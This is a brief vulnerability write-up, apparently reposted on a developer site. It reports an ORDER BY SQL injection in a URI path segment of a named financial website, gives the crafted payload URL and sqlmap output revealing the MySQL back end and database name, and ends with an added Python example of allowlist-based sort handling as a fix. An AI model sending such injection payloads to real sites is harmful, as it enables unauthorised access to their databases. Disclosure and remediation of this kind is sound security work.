
URI injection on a Tonghuashun site

程序员文章站 2022-04-07 16:11:43

ORDER BY injection in the URI

Original request
https://trust.10jqka.com.cn/xtcp/_0_0_0_0_all_yqsyl_desc_1.shtml

The desc segment is vulnerable to ORDER BY injection. Constructed payload:

https://trust.10jqka.com.cn/xtcp/_0_0_0_0_all_yqsyl_desc,1-if(1=1,1,(select+1+union+select+2))_1.shtml

sqlmap retrieved the following data:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: https://trust.10jqka.com.cn:80/xtcp/_0_0_0_0_all_yqsyl_desc,1-if(1=1 AND 7128=7128,1,(select+1+union+select+2))_1.shtml
---
[21:52:58] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[21:52:58] [INFO] testing MySQL

[21:52:58] [INFO] confirming MySQL

[21:52:58] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.0

[21:52:58] [INFO] fetching current database

[21:52:58] [INFO] resumed: invest

current database: 'invest'

[21:52:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/trust.10jqka.com.cn'

[*] shutting down at 21:52:58

Solution:

Filter the input.
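
One way to apply that filtering to the sort segment is an allowlist lookup instead of character stripping. The following is an added example, not code from the original report or from the affected site; the path layout, segment meanings, table name and column names are assumptions.

```python
import re

# Assumed layout of the listing path shown on the page:
#   /xtcp/_<n>_<n>_<n>_<n>_<category>_<sort key>_<direction>_<page>.shtml
# Segment meanings, table and column names are assumptions for illustration.
ROUTE = re.compile(
    r"/xtcp/_([0-9]+)_([0-9]+)_([0-9]+)_([0-9]+)"
    r"_([^_/]+)_([^_/]+)_([^_/]+)_([0-9]{1,4})\.shtml"
)

# ORDER BY takes identifiers and keywords, which cannot be bound as query
# parameters, so each URI token is mapped to a fixed SQL fragment instead.
SORT_COLUMNS = {"yqsyl": "expected_yield"}  # hypothetical column name
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}
PAGE_SIZE = 20


class BadRequest(ValueError):
    """Raised when the path does not map to a known listing query."""


def build_listing_query(path):
    """Return (sql, params) for a listing path, or raise BadRequest."""
    m = ROUTE.fullmatch(path)
    if m is None:
        raise BadRequest("malformed listing path")
    sort_key, direction, page = m.group(6), m.group(7), int(m.group(8))
    if sort_key not in SORT_COLUMNS or direction not in DIRECTIONS:
        # Anything other than an exact allowlisted token is refused; the raw
        # text is never cleaned up, escaped or copied into the statement.
        raise BadRequest("unsupported sort order")
    if page < 1:
        raise BadRequest("page out of range")
    sql = (
        "SELECT id, name FROM trust_products "  # hypothetical table
        f"ORDER BY {SORT_COLUMNS[sort_key]} {DIRECTIONS[direction]} "
        "LIMIT %s OFFSET %s"  # values bound by the MySQL driver
    )
    return sql, (PAGE_SIZE, (page - 1) * PAGE_SIZE)


if __name__ == "__main__":
    ok = "/xtcp/_0_0_0_0_all_yqsyl_desc_1.shtml"
    print(build_listing_query(ok))
    try:  # direction segment carrying extra SQL, as in the report
        build_listing_query(ok.replace("_desc_", "_desc,1-if(1=1,1,2)_"))
    except BadRequest as exc:
        print("rejected:", exc)
```
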